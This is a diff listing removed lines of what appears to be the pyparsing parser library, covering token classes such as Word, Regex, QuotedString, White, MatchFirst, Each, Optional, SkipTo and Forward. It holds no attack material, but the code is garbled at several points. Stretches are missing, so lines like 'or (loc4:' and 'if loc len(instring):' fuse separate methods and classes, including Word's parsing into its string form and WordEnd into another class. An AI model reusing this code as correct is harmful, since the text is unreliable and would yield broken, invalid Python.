- def parseImpl( self, instring, loc, doActions=True ):
- if ( (instring[ loc:loc+self.matchLen ].upper() == self.caselessmatch) and
- (loc >= len(instring)-self.matchLen or instring[loc+self.matchLen].upper() not in self.identChars) ):
- return loc+self.matchLen, self.match
- raise ParseException(instring, loc, self.errmsg, self)
-
-class Word(Token):
- """Token for matching words composed of allowed character sets.
- Defined with string containing all allowed initial characters,
- an optional string containing allowed body characters (if omitted,
- defaults to the initial character set), and an optional minimum,
- maximum, and/or exact length. The default value for C{min} is 1 (a
- minimum value < 1 is not valid); the default values for C{max} and C{exact}
- are 0, meaning no maximum or exact length restriction. An optional
- C{exclude} parameter can list characters that might be found in
- the input C{bodyChars} string; useful to define a word of all printables
- except for one or two characters, for instance.
- """
- def __init__( self, initChars, bodyChars=None, min=1, max=0, exact=0, asKeyword=False, excludeChars=None ):
- super(Word,self).__init__()
- if excludeChars:
- initChars = ''.join(c for c in initChars if c not in excludeChars)
- if bodyChars:
- bodyChars = ''.join(c for c in bodyChars if c not in excludeChars)
- self.initCharsOrig = initChars
- self.initChars = set(initChars)
- if bodyChars :
- self.bodyCharsOrig = bodyChars
- self.bodyChars = set(bodyChars)
- else:
- self.bodyCharsOrig = initChars
- self.bodyChars = set(initChars)
-
- self.maxSpecified = max > 0
-
- if min < 1:
- raise ValueError("cannot specify a minimum length < 1; use Optional(Word()) if zero-length word is permitted")
-
- self.minLen = min
-
- if max > 0:
- self.maxLen = max
- else:
- self.maxLen = _MAX_INT
-
- if exact > 0:
- self.maxLen = exact
- self.minLen = exact
-
- self.name = _ustr(self)
- self.errmsg = "Expected " + self.name
- self.mayIndexError = False
- self.asKeyword = asKeyword
-
- if ' ' not in self.initCharsOrig+self.bodyCharsOrig and (min==1 and max==0 and exact==0):
- if self.bodyCharsOrig == self.initCharsOrig:
- self.reString = "[%s]+" % _escapeRegexRangeChars(self.initCharsOrig)
- elif len(self.bodyCharsOrig) == 1:
- self.reString = "%s[%s]*" % \
- (re.escape(self.initCharsOrig),
- _escapeRegexRangeChars(self.bodyCharsOrig),)
- else:
- self.reString = "[%s][%s]*" % \
- (_escapeRegexRangeChars(self.initCharsOrig),
- _escapeRegexRangeChars(self.bodyCharsOrig),)
- if self.asKeyword:
- self.reString = r"\b"+self.reString+r"\b"
- try:
- self.re = re.compile( self.reString )
- except:
- self.re = None
-
- def parseImpl( self, instring, loc, doActions=True ):
- if self.re:
- result = self.re.match(instring,loc)
- if not result:
- raise ParseException(instring, loc, self.errmsg, self)
-
- loc = result.end()
- return loc, result.group()
-
- if not(instring[ loc ] in self.initChars):
- raise ParseException(instring, loc, self.errmsg, self)
-
- start = loc
- loc += 1
- instrlen = len(instring)
- bodychars = self.bodyChars
- maxloc = start + self.maxLen
- maxloc = min( maxloc, instrlen )
- while loc < maxloc and instring[loc] in bodychars:
- loc += 1
-
- throwException = False
- if loc - start < self.minLen:
- throwException = True
- if self.maxSpecified and loc < instrlen and instring[loc] in bodychars:
- throwException = True
- if self.asKeyword:
- if (start>0 and instring[start-1] in bodychars) or (loc4:
- return s[:4]+"..."
- else:
- return s
-
- if ( self.initCharsOrig != self.bodyCharsOrig ):
- self.strRepr = "W:(%s,%s)" % ( charsAsStr(self.initCharsOrig), charsAsStr(self.bodyCharsOrig) )
- else:
- self.strRepr = "W:(%s)" % charsAsStr(self.initCharsOrig)
-
- return self.strRepr
-
-
-class Regex(Token):
- """Token for matching strings that match a given regular expression.
- Defined with string specifying the regular expression in a form recognized by the inbuilt Python re module.
- """
- compiledREtype = type(re.compile("[A-Z]"))
- def __init__( self, pattern, flags=0):
- """The parameters C{pattern} and C{flags} are passed to the C{re.compile()} function as-is. See the Python C{re} module for an explanation of the acceptable patterns and flags."""
- super(Regex,self).__init__()
-
- if isinstance(pattern, basestring):
- if len(pattern) == 0:
- warnings.warn("null string passed to Regex; use Empty() instead",
- SyntaxWarning, stacklevel=2)
-
- self.pattern = pattern
- self.flags = flags
-
- try:
- self.re = re.compile(self.pattern, self.flags)
- self.reString = self.pattern
- except sre_constants.error:
- warnings.warn("invalid pattern (%s) passed to Regex" % pattern,
- SyntaxWarning, stacklevel=2)
- raise
-
- elif isinstance(pattern, Regex.compiledREtype):
- self.re = pattern
- self.pattern = \
- self.reString = str(pattern)
- self.flags = flags
-
- else:
- raise ValueError("Regex may only be constructed with a string or a compiled RE object")
-
- self.name = _ustr(self)
- self.errmsg = "Expected " + self.name
- self.mayIndexError = False
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- result = self.re.match(instring,loc)
- if not result:
- raise ParseException(instring, loc, self.errmsg, self)
-
- loc = result.end()
- d = result.groupdict()
- ret = ParseResults(result.group())
- if d:
- for k in d:
- ret[k] = d[k]
- return loc,ret
-
- def __str__( self ):
- try:
- return super(Regex,self).__str__()
- except:
- pass
-
- if self.strRepr is None:
- self.strRepr = "Re:(%s)" % repr(self.pattern)
-
- return self.strRepr
-
-
-class QuotedString(Token):
- """Token for matching strings that are delimited by quoting characters.
- """
- def __init__( self, quoteChar, escChar=None, escQuote=None, multiline=False, unquoteResults=True, endQuoteChar=None):
- """
- Defined with the following parameters:
- - quoteChar - string of one or more characters defining the quote delimiting string
- - escChar - character to escape quotes, typically backslash (default=None)
- - escQuote - special quote sequence to escape an embedded quote string (such as SQL's "" to escape an embedded ") (default=None)
- - multiline - boolean indicating whether quotes can span multiple lines (default=C{False})
- - unquoteResults - boolean indicating whether the matched text should be unquoted (default=C{True})
- - endQuoteChar - string of one or more characters defining the end of the quote delimited string (default=C{None} => same as quoteChar)
- """
- super(QuotedString,self).__init__()
-
- # remove white space from quote chars - wont work anyway
- quoteChar = quoteChar.strip()
- if len(quoteChar) == 0:
- warnings.warn("quoteChar cannot be the empty string",SyntaxWarning,stacklevel=2)
- raise SyntaxError()
-
- if endQuoteChar is None:
- endQuoteChar = quoteChar
- else:
- endQuoteChar = endQuoteChar.strip()
- if len(endQuoteChar) == 0:
- warnings.warn("endQuoteChar cannot be the empty string",SyntaxWarning,stacklevel=2)
- raise SyntaxError()
-
- self.quoteChar = quoteChar
- self.quoteCharLen = len(quoteChar)
- self.firstQuoteChar = quoteChar[0]
- self.endQuoteChar = endQuoteChar
- self.endQuoteCharLen = len(endQuoteChar)
- self.escChar = escChar
- self.escQuote = escQuote
- self.unquoteResults = unquoteResults
-
- if multiline:
- self.flags = re.MULTILINE | re.DOTALL
- self.pattern = r'%s(?:[^%s%s]' % \
- ( re.escape(self.quoteChar),
- _escapeRegexRangeChars(self.endQuoteChar[0]),
- (escChar is not None and _escapeRegexRangeChars(escChar) or '') )
- else:
- self.flags = 0
- self.pattern = r'%s(?:[^%s\n\r%s]' % \
- ( re.escape(self.quoteChar),
- _escapeRegexRangeChars(self.endQuoteChar[0]),
- (escChar is not None and _escapeRegexRangeChars(escChar) or '') )
- if len(self.endQuoteChar) > 1:
- self.pattern += (
- '|(?:' + ')|(?:'.join("%s[^%s]" % (re.escape(self.endQuoteChar[:i]),
- _escapeRegexRangeChars(self.endQuoteChar[i]))
- for i in range(len(self.endQuoteChar)-1,0,-1)) + ')'
- )
- if escQuote:
- self.pattern += (r'|(?:%s)' % re.escape(escQuote))
- if escChar:
- self.pattern += (r'|(?:%s.)' % re.escape(escChar))
- self.escCharReplacePattern = re.escape(self.escChar)+"(.)"
- self.pattern += (r')*%s' % re.escape(self.endQuoteChar))
-
- try:
- self.re = re.compile(self.pattern, self.flags)
- self.reString = self.pattern
- except sre_constants.error:
- warnings.warn("invalid pattern (%s) passed to Regex" % self.pattern,
- SyntaxWarning, stacklevel=2)
- raise
-
- self.name = _ustr(self)
- self.errmsg = "Expected " + self.name
- self.mayIndexError = False
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- result = instring[loc] == self.firstQuoteChar and self.re.match(instring,loc) or None
- if not result:
- raise ParseException(instring, loc, self.errmsg, self)
-
- loc = result.end()
- ret = result.group()
-
- if self.unquoteResults:
-
- # strip off quotes
- ret = ret[self.quoteCharLen:-self.endQuoteCharLen]
-
- if isinstance(ret,basestring):
- # replace escaped characters
- if self.escChar:
- ret = re.sub(self.escCharReplacePattern,"\g<1>",ret)
-
- # replace escaped quotes
- if self.escQuote:
- ret = ret.replace(self.escQuote, self.endQuoteChar)
-
- return loc, ret
-
- def __str__( self ):
- try:
- return super(QuotedString,self).__str__()
- except:
- pass
-
- if self.strRepr is None:
- self.strRepr = "quoted string, starting with %s ending with %s" % (self.quoteChar, self.endQuoteChar)
-
- return self.strRepr
-
-
-class CharsNotIn(Token):
- """Token for matching words composed of characters *not* in a given set.
- Defined with string containing all disallowed characters, and an optional
- minimum, maximum, and/or exact length. The default value for C{min} is 1 (a
- minimum value < 1 is not valid); the default values for C{max} and C{exact}
- are 0, meaning no maximum or exact length restriction.
- """
- def __init__( self, notChars, min=1, max=0, exact=0 ):
- super(CharsNotIn,self).__init__()
- self.skipWhitespace = False
- self.notChars = notChars
-
- if min < 1:
- raise ValueError("cannot specify a minimum length < 1; use Optional(CharsNotIn()) if zero-length char group is permitted")
-
- self.minLen = min
-
- if max > 0:
- self.maxLen = max
- else:
- self.maxLen = _MAX_INT
-
- if exact > 0:
- self.maxLen = exact
- self.minLen = exact
-
- self.name = _ustr(self)
- self.errmsg = "Expected " + self.name
- self.mayReturnEmpty = ( self.minLen == 0 )
- self.mayIndexError = False
-
- def parseImpl( self, instring, loc, doActions=True ):
- if instring[loc] in self.notChars:
- raise ParseException(instring, loc, self.errmsg, self)
-
- start = loc
- loc += 1
- notchars = self.notChars
- maxlen = min( start+self.maxLen, len(instring) )
- while loc < maxlen and \
- (instring[loc] not in notchars):
- loc += 1
-
- if loc - start < self.minLen:
- raise ParseException(instring, loc, self.errmsg, self)
-
- return loc, instring[start:loc]
-
- def __str__( self ):
- try:
- return super(CharsNotIn, self).__str__()
- except:
- pass
-
- if self.strRepr is None:
- if len(self.notChars) > 4:
- self.strRepr = "!W:(%s...)" % self.notChars[:4]
- else:
- self.strRepr = "!W:(%s)" % self.notChars
-
- return self.strRepr
-
-class White(Token):
- """Special matching class for matching whitespace. Normally, whitespace is ignored
- by pyparsing grammars. This class is included when some whitespace structures
- are significant. Define with a string containing the whitespace characters to be
- matched; default is C{" \\t\\r\\n"}. Also takes optional C{min}, C{max}, and C{exact} arguments,
- as defined for the C{L{Word}} class."""
- whiteStrs = {
- " " : "",
- "\t": "",
- "\n": "",
- "\r": "",
- "\f": "",
- }
- def __init__(self, ws=" \t\r\n", min=1, max=0, exact=0):
- super(White,self).__init__()
- self.matchWhite = ws
- self.setWhitespaceChars( "".join(c for c in self.whiteChars if c not in self.matchWhite) )
- #~ self.leaveWhitespace()
- self.name = ("".join(White.whiteStrs[c] for c in self.matchWhite))
- self.mayReturnEmpty = True
- self.errmsg = "Expected " + self.name
-
- self.minLen = min
-
- if max > 0:
- self.maxLen = max
- else:
- self.maxLen = _MAX_INT
-
- if exact > 0:
- self.maxLen = exact
- self.minLen = exact
-
- def parseImpl( self, instring, loc, doActions=True ):
- if not(instring[ loc ] in self.matchWhite):
- raise ParseException(instring, loc, self.errmsg, self)
- start = loc
- loc += 1
- maxloc = start + self.maxLen
- maxloc = min( maxloc, len(instring) )
- while loc < maxloc and instring[loc] in self.matchWhite:
- loc += 1
-
- if loc - start < self.minLen:
- raise ParseException(instring, loc, self.errmsg, self)
-
- return loc, instring[start:loc]
-
-
-class _PositionToken(Token):
- def __init__( self ):
- super(_PositionToken,self).__init__()
- self.name=self.__class__.__name__
- self.mayReturnEmpty = True
- self.mayIndexError = False
-
-class GoToColumn(_PositionToken):
- """Token to advance to a specific column of input text; useful for tabular report scraping."""
- def __init__( self, colno ):
- super(GoToColumn,self).__init__()
- self.col = colno
-
- def preParse( self, instring, loc ):
- if col(loc,instring) != self.col:
- instrlen = len(instring)
- if self.ignoreExprs:
- loc = self._skipIgnorables( instring, loc )
- while loc < instrlen and instring[loc].isspace() and col( loc, instring ) != self.col :
- loc += 1
- return loc
-
- def parseImpl( self, instring, loc, doActions=True ):
- thiscol = col( loc, instring )
- if thiscol > self.col:
- raise ParseException( instring, loc, "Text not in expected column", self )
- newloc = loc + self.col - thiscol
- ret = instring[ loc: newloc ]
- return newloc, ret
-
-class LineStart(_PositionToken):
- """Matches if current position is at the beginning of a line within the parse string"""
- def __init__( self ):
- super(LineStart,self).__init__()
- self.setWhitespaceChars( ParserElement.DEFAULT_WHITE_CHARS.replace("\n","") )
- self.errmsg = "Expected start of line"
-
- def preParse( self, instring, loc ):
- preloc = super(LineStart,self).preParse(instring,loc)
- if instring[preloc] == "\n":
- loc += 1
- return loc
-
- def parseImpl( self, instring, loc, doActions=True ):
- if not( loc==0 or
- (loc == self.preParse( instring, 0 )) or
- (instring[loc-1] == "\n") ): #col(loc, instring) != 1:
- raise ParseException(instring, loc, self.errmsg, self)
- return loc, []
-
-class LineEnd(_PositionToken):
- """Matches if current position is at the end of a line within the parse string"""
- def __init__( self ):
- super(LineEnd,self).__init__()
- self.setWhitespaceChars( ParserElement.DEFAULT_WHITE_CHARS.replace("\n","") )
- self.errmsg = "Expected end of line"
-
- def parseImpl( self, instring, loc, doActions=True ):
- if loc len(instring):
- return loc, []
- else:
- raise ParseException(instring, loc, self.errmsg, self)
-
-class WordStart(_PositionToken):
- """Matches if the current position is at the beginning of a Word, and
- is not preceded by any character in a given set of C{wordChars}
- (default=C{printables}). To emulate the C{\b} behavior of regular expressions,
- use C{WordStart(alphanums)}. C{WordStart} will also match at the beginning of
- the string being parsed, or at the beginning of a line.
- """
- def __init__(self, wordChars = printables):
- super(WordStart,self).__init__()
- self.wordChars = set(wordChars)
- self.errmsg = "Not at the start of a word"
-
- def parseImpl(self, instring, loc, doActions=True ):
- if loc != 0:
- if (instring[loc-1] in self.wordChars or
- instring[loc] not in self.wordChars):
- raise ParseException(instring, loc, self.errmsg, self)
- return loc, []
-
-class WordEnd(_PositionToken):
- """Matches if the current position is at the end of a Word, and
- is not followed by any character in a given set of C{wordChars}
- (default=C{printables}). To emulate the C{\b} behavior of regular expressions,
- use C{WordEnd(alphanums)}. C{WordEnd} will also match at the end of
- the string being parsed, or at the end of a line.
- """
- def __init__(self, wordChars = printables):
- super(WordEnd,self).__init__()
- self.wordChars = set(wordChars)
- self.skipWhitespace = False
- self.errmsg = "Not at the end of a word"
-
- def parseImpl(self, instring, loc, doActions=True ):
- instrlen = len(instring)
- if instrlen>0 and loc maxExcLoc:
- maxException = err
- maxExcLoc = err.loc
- except IndexError:
- if len(instring) > maxExcLoc:
- maxException = ParseException(instring,len(instring),e.errmsg,self)
- maxExcLoc = len(instring)
- else:
- if loc2 > maxMatchLoc:
- maxMatchLoc = loc2
- maxMatchExp = e
-
- if maxMatchLoc < 0:
- if maxException is not None:
- raise maxException
- else:
- raise ParseException(instring, loc, "no defined alternatives to match", self)
-
- return maxMatchExp._parse( instring, loc, doActions )
-
- def __ixor__(self, other ):
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- return self.append( other ) #Or( [ self, other ] )
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "{" + " ^ ".join(_ustr(e) for e in self.exprs) + "}"
-
- return self.strRepr
-
- def checkRecursion( self, parseElementList ):
- subRecCheckList = parseElementList[:] + [ self ]
- for e in self.exprs:
- e.checkRecursion( subRecCheckList )
-
-
-class MatchFirst(ParseExpression):
- """Requires that at least one C{ParseExpression} is found.
- If two expressions match, the first one listed is the one that will match.
- May be constructed using the C{'|'} operator.
- """
- def __init__( self, exprs, savelist = False ):
- super(MatchFirst,self).__init__(exprs, savelist)
- if self.exprs:
- self.mayReturnEmpty = any(e.mayReturnEmpty for e in self.exprs)
- else:
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- maxExcLoc = -1
- maxException = None
- for e in self.exprs:
- try:
- ret = e._parse( instring, loc, doActions )
- return ret
- except ParseException as err:
- if err.loc > maxExcLoc:
- maxException = err
- maxExcLoc = err.loc
- except IndexError:
- if len(instring) > maxExcLoc:
- maxException = ParseException(instring,len(instring),e.errmsg,self)
- maxExcLoc = len(instring)
-
- # only got here if no expression matched, raise exception for match that made it the furthest
- else:
- if maxException is not None:
- raise maxException
- else:
- raise ParseException(instring, loc, "no defined alternatives to match", self)
-
- def __ior__(self, other ):
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- return self.append( other ) #MatchFirst( [ self, other ] )
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "{" + " | ".join(_ustr(e) for e in self.exprs) + "}"
-
- return self.strRepr
-
- def checkRecursion( self, parseElementList ):
- subRecCheckList = parseElementList[:] + [ self ]
- for e in self.exprs:
- e.checkRecursion( subRecCheckList )
-
-
-class Each(ParseExpression):
- """Requires all given C{ParseExpression}s to be found, but in any order.
- Expressions may be separated by whitespace.
- May be constructed using the C{'&'} operator.
- """
- def __init__( self, exprs, savelist = True ):
- super(Each,self).__init__(exprs, savelist)
- self.mayReturnEmpty = all(e.mayReturnEmpty for e in self.exprs)
- self.skipWhitespace = True
- self.initExprGroups = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- if self.initExprGroups:
- opt1 = [ e.expr for e in self.exprs if isinstance(e,Optional) ]
- opt2 = [ e for e in self.exprs if e.mayReturnEmpty and e not in opt1 ]
- self.optionals = opt1 + opt2
- self.multioptionals = [ e.expr for e in self.exprs if isinstance(e,ZeroOrMore) ]
- self.multirequired = [ e.expr for e in self.exprs if isinstance(e,OneOrMore) ]
- self.required = [ e for e in self.exprs if not isinstance(e,(Optional,ZeroOrMore,OneOrMore)) ]
- self.required += self.multirequired
- self.initExprGroups = False
- tmpLoc = loc
- tmpReqd = self.required[:]
- tmpOpt = self.optionals[:]
- matchOrder = []
-
- keepMatching = True
- while keepMatching:
- tmpExprs = tmpReqd + tmpOpt + self.multioptionals + self.multirequired
- failed = []
- for e in tmpExprs:
- try:
- tmpLoc = e.tryParse( instring, tmpLoc )
- except ParseException:
- failed.append(e)
- else:
- matchOrder.append(e)
- if e in tmpReqd:
- tmpReqd.remove(e)
- elif e in tmpOpt:
- tmpOpt.remove(e)
- if len(failed) == len(tmpExprs):
- keepMatching = False
-
- if tmpReqd:
- missing = ", ".join(_ustr(e) for e in tmpReqd)
- raise ParseException(instring,loc,"Missing one or more required elements (%s)" % missing )
-
- # add any unmatched Optionals, in case they have default values defined
- matchOrder += [e for e in self.exprs if isinstance(e,Optional) and e.expr in tmpOpt]
-
- resultlist = []
- for e in matchOrder:
- loc,results = e._parse(instring,loc,doActions)
- resultlist.append(results)
-
- finalResults = ParseResults([])
- for r in resultlist:
- dups = {}
- for k in r.keys():
- if k in finalResults:
- tmp = ParseResults(finalResults[k])
- tmp += ParseResults(r[k])
- dups[k] = tmp
- finalResults += ParseResults(r)
- for k,v in dups.items():
- finalResults[k] = v
- return loc, finalResults
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "{" + " & ".join(_ustr(e) for e in self.exprs) + "}"
-
- return self.strRepr
-
- def checkRecursion( self, parseElementList ):
- subRecCheckList = parseElementList[:] + [ self ]
- for e in self.exprs:
- e.checkRecursion( subRecCheckList )
-
-
-class ParseElementEnhance(ParserElement):
- """Abstract subclass of C{ParserElement}, for combining and post-processing parsed tokens."""
- def __init__( self, expr, savelist=False ):
- super(ParseElementEnhance,self).__init__(savelist)
- if isinstance( expr, basestring ):
- expr = Literal(expr)
- self.expr = expr
- self.strRepr = None
- if expr is not None:
- self.mayIndexError = expr.mayIndexError
- self.mayReturnEmpty = expr.mayReturnEmpty
- self.setWhitespaceChars( expr.whiteChars )
- self.skipWhitespace = expr.skipWhitespace
- self.saveAsList = expr.saveAsList
- self.callPreparse = expr.callPreparse
- self.ignoreExprs.extend(expr.ignoreExprs)
-
- def parseImpl( self, instring, loc, doActions=True ):
- if self.expr is not None:
- return self.expr._parse( instring, loc, doActions, callPreParse=False )
- else:
- raise ParseException("",loc,self.errmsg,self)
-
- def leaveWhitespace( self ):
- self.skipWhitespace = False
- self.expr = self.expr.copy()
- if self.expr is not None:
- self.expr.leaveWhitespace()
- return self
-
- def ignore( self, other ):
- if isinstance( other, Suppress ):
- if other not in self.ignoreExprs:
- super( ParseElementEnhance, self).ignore( other )
- if self.expr is not None:
- self.expr.ignore( self.ignoreExprs[-1] )
- else:
- super( ParseElementEnhance, self).ignore( other )
- if self.expr is not None:
- self.expr.ignore( self.ignoreExprs[-1] )
- return self
-
- def streamline( self ):
- super(ParseElementEnhance,self).streamline()
- if self.expr is not None:
- self.expr.streamline()
- return self
-
- def checkRecursion( self, parseElementList ):
- if self in parseElementList:
- raise RecursiveGrammarException( parseElementList+[self] )
- subRecCheckList = parseElementList[:] + [ self ]
- if self.expr is not None:
- self.expr.checkRecursion( subRecCheckList )
-
- def validate( self, validateTrace=[] ):
- tmp = validateTrace[:]+[self]
- if self.expr is not None:
- self.expr.validate(tmp)
- self.checkRecursion( [] )
-
- def __str__( self ):
- try:
- return super(ParseElementEnhance,self).__str__()
- except:
- pass
-
- if self.strRepr is None and self.expr is not None:
- self.strRepr = "%s:(%s)" % ( self.__class__.__name__, _ustr(self.expr) )
- return self.strRepr
-
-
-class FollowedBy(ParseElementEnhance):
- """Lookahead matching of the given parse expression. C{FollowedBy}
- does *not* advance the parsing position within the input string, it only
- verifies that the specified parse expression matches at the current
- position. C{FollowedBy} always returns a null token list."""
- def __init__( self, expr ):
- super(FollowedBy,self).__init__(expr)
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- self.expr.tryParse( instring, loc )
- return loc, []
-
-
-class NotAny(ParseElementEnhance):
- """Lookahead to disallow matching with the given parse expression. C{NotAny}
- does *not* advance the parsing position within the input string, it only
- verifies that the specified parse expression does *not* match at the current
- position. Also, C{NotAny} does *not* skip over leading whitespace. C{NotAny}
- always returns a null token list. May be constructed using the '~' operator."""
- def __init__( self, expr ):
- super(NotAny,self).__init__(expr)
- #~ self.leaveWhitespace()
- self.skipWhitespace = False # do NOT use self.leaveWhitespace(), don't want to propagate to exprs
- self.mayReturnEmpty = True
- self.errmsg = "Found unwanted token, "+_ustr(self.expr)
-
- def parseImpl( self, instring, loc, doActions=True ):
- try:
- self.expr.tryParse( instring, loc )
- except (ParseException,IndexError):
- pass
- else:
- raise ParseException(instring, loc, self.errmsg, self)
- return loc, []
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "~{" + _ustr(self.expr) + "}"
-
- return self.strRepr
-
-
-class ZeroOrMore(ParseElementEnhance):
- """Optional repetition of zero or more of the given expression."""
- def __init__( self, expr ):
- super(ZeroOrMore,self).__init__(expr)
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- tokens = []
- try:
- loc, tokens = self.expr._parse( instring, loc, doActions, callPreParse=False )
- hasIgnoreExprs = ( len(self.ignoreExprs) > 0 )
- while 1:
- if hasIgnoreExprs:
- preloc = self._skipIgnorables( instring, loc )
- else:
- preloc = loc
- loc, tmptokens = self.expr._parse( instring, preloc, doActions )
- if tmptokens or tmptokens.haskeys():
- tokens += tmptokens
- except (ParseException,IndexError):
- pass
-
- return loc, tokens
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "[" + _ustr(self.expr) + "]..."
-
- return self.strRepr
-
- def setResultsName( self, name, listAllMatches=False ):
- ret = super(ZeroOrMore,self).setResultsName(name,listAllMatches)
- ret.saveAsList = True
- return ret
-
-
-class OneOrMore(ParseElementEnhance):
- """Repetition of one or more of the given expression."""
- def parseImpl( self, instring, loc, doActions=True ):
- # must be at least one
- loc, tokens = self.expr._parse( instring, loc, doActions, callPreParse=False )
- try:
- hasIgnoreExprs = ( len(self.ignoreExprs) > 0 )
- while 1:
- if hasIgnoreExprs:
- preloc = self._skipIgnorables( instring, loc )
- else:
- preloc = loc
- loc, tmptokens = self.expr._parse( instring, preloc, doActions )
- if tmptokens or tmptokens.haskeys():
- tokens += tmptokens
- except (ParseException,IndexError):
- pass
-
- return loc, tokens
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "{" + _ustr(self.expr) + "}..."
-
- return self.strRepr
-
- def setResultsName( self, name, listAllMatches=False ):
- ret = super(OneOrMore,self).setResultsName(name,listAllMatches)
- ret.saveAsList = True
- return ret
-
-class _NullToken(object):
- def __bool__(self):
- return False
- __nonzero__ = __bool__
- def __str__(self):
- return ""
-
-_optionalNotMatched = _NullToken()
-class Optional(ParseElementEnhance):
- """Optional matching of the given expression.
- A default return string can also be specified, if the optional expression
- is not found.
- """
- def __init__( self, expr, default=_optionalNotMatched ):
- super(Optional,self).__init__( expr, savelist=False )
- self.defaultValue = default
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- try:
- loc, tokens = self.expr._parse( instring, loc, doActions, callPreParse=False )
- except (ParseException,IndexError):
- if self.defaultValue is not _optionalNotMatched:
- if self.expr.resultsName:
- tokens = ParseResults([ self.defaultValue ])
- tokens[self.expr.resultsName] = self.defaultValue
- else:
- tokens = [ self.defaultValue ]
- else:
- tokens = []
- return loc, tokens
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "[" + _ustr(self.expr) + "]"
-
- return self.strRepr
-
-
-class SkipTo(ParseElementEnhance):
- """Token for skipping over all undefined text until the matched expression is found.
- If C{include} is set to true, the matched expression is also parsed (the skipped text
- and matched expression are returned as a 2-element list). The C{ignore}
- argument is used to define grammars (typically quoted strings and comments) that
- might contain false matches.
- """
- def __init__( self, other, include=False, ignore=None, failOn=None ):
- super( SkipTo, self ).__init__( other )
- self.ignoreExpr = ignore
- self.mayReturnEmpty = True
- self.mayIndexError = False
- self.includeMatch = include
- self.asList = False
- if failOn is not None and isinstance(failOn, basestring):
- self.failOn = Literal(failOn)
- else:
- self.failOn = failOn
- self.errmsg = "No match found for "+_ustr(self.expr)
-
- def parseImpl( self, instring, loc, doActions=True ):
- startLoc = loc
- instrlen = len(instring)
- expr = self.expr
- failParse = False
- while loc <= instrlen:
- try:
- if self.failOn:
- try:
- self.failOn.tryParse(instring, loc)
- except ParseBaseException:
- pass
- else:
- failParse = True
- raise ParseException(instring, loc, "Found expression " + str(self.failOn))
- failParse = False
- if self.ignoreExpr is not None:
- while 1:
- try:
- loc = self.ignoreExpr.tryParse(instring,loc)
- # print("found ignoreExpr, advance to", loc)
- except ParseBaseException:
- break
- expr._parse( instring, loc, doActions=False, callPreParse=False )
- skipText = instring[startLoc:loc]
- if self.includeMatch:
- loc,mat = expr._parse(instring,loc,doActions,callPreParse=False)
- if mat:
- skipRes = ParseResults( skipText )
- skipRes += mat
- return loc, [ skipRes ]
- else:
- return loc, [ skipText ]
- else:
- return loc, [ skipText ]
- except (ParseException,IndexError):
- if failParse:
- raise
- else:
- loc += 1
- raise ParseException(instring, loc, self.errmsg, self)
-
-class Forward(ParseElementEnhance):
- """Forward declaration of an expression to be defined later -
- used for recursive grammars, such as algebraic infix notation.
- When the expression is known, it is assigned to the C{Forward} variable using the '<<' operator.
-
- Note: take care when assigning to C{Forward} not to overlook precedence of operators.
- Specifically, '|' has a lower precedence than '<<', so that::
- fwdExpr << a | b | c
- will actually be evaluated as::
- (fwdExpr << a) | b | c
- thereby leaving b and c out as parseable alternatives. It is recommended that you
- explicitly group the values inserted into the C{Forward}::
- fwdExpr << (a | b | c)
- Converting to use the '<<=' operator instead will avoid this problem.
- """
- def __init__( self, other=None ):
- super(Forward,self).__init__( other, savelist=False )
-
- def __lshift__( self, other ):
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass(other)
- self.expr = other
- self.mayReturnEmpty = other.mayReturnEmpty
- self.strRepr = None
- self.mayIndexError = self.expr.mayIndexError
- self.mayReturnEmpty = self.expr.mayReturnEmpty
- self.setWhitespaceChars( self.expr.whiteChars )
- self.skipWhitespace = self.expr.skipWhitespace
- self.saveAsList = self.expr.saveAsList
- self.ignoreExprs.extend(self.expr.ignoreExprs)
- return self
-
- def __ilshift__(self, other):
- return self << other
-
- def leaveWhitespace( self ):
- self.skipWhitespace = False
- return self
-
- def streamline( self ):
- if not self.streamlined:
- self.streamlined = True
- if self.expr is not None:
- self.expr.streamline()
- return self
-
- def validate( self, validateTrace=[] ):
- if self not in validateTrace:
- tmp = validateTrace[:]+[self]
- if self.expr is not None:
- self.expr.validate(tmp)
- self.checkRecursion([])
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- self._revertClass = self.__class__
- self.__class__ = _ForwardNoRecurse
- try:
- if self.expr is not None:
- retString = _ustr(self.expr)
- else:
- retString = "None"
- finally:
- self.__class__ = self._revertClass
- return self.__class__.__name__ + ": " + retString
-
- def copy(self):
- if self.expr is not None:
- return super(Forward,self).copy()
- else:
- ret = Forward()
- ret <<= self
- return ret
-
-class _ForwardNoRecurse(Forward):
- def __str__( self ):
- return "..."
-
-class TokenConverter(ParseElementEnhance):
- """Abstract subclass of C{ParseExpression}, for converting parsed results."""
- def __init__( self, expr, savelist=False ):
- super(TokenConverter,self).__init__( expr )#, savelist )
- self.saveAsList = False
-
-class Upcase(TokenConverter):
- """Converter to upper case all matching tokens."""
- def __init__(self, *args):
- super(Upcase,self).__init__(*args)
- warnings.warn("Upcase class is deprecated, use upcaseTokens parse action instead",
- DeprecationWarning,stacklevel=2)
-
- def postParse( self, instring, loc, tokenlist ):
- return list(map( str.upper, tokenlist ))
-
-
-class Combine(TokenConverter):
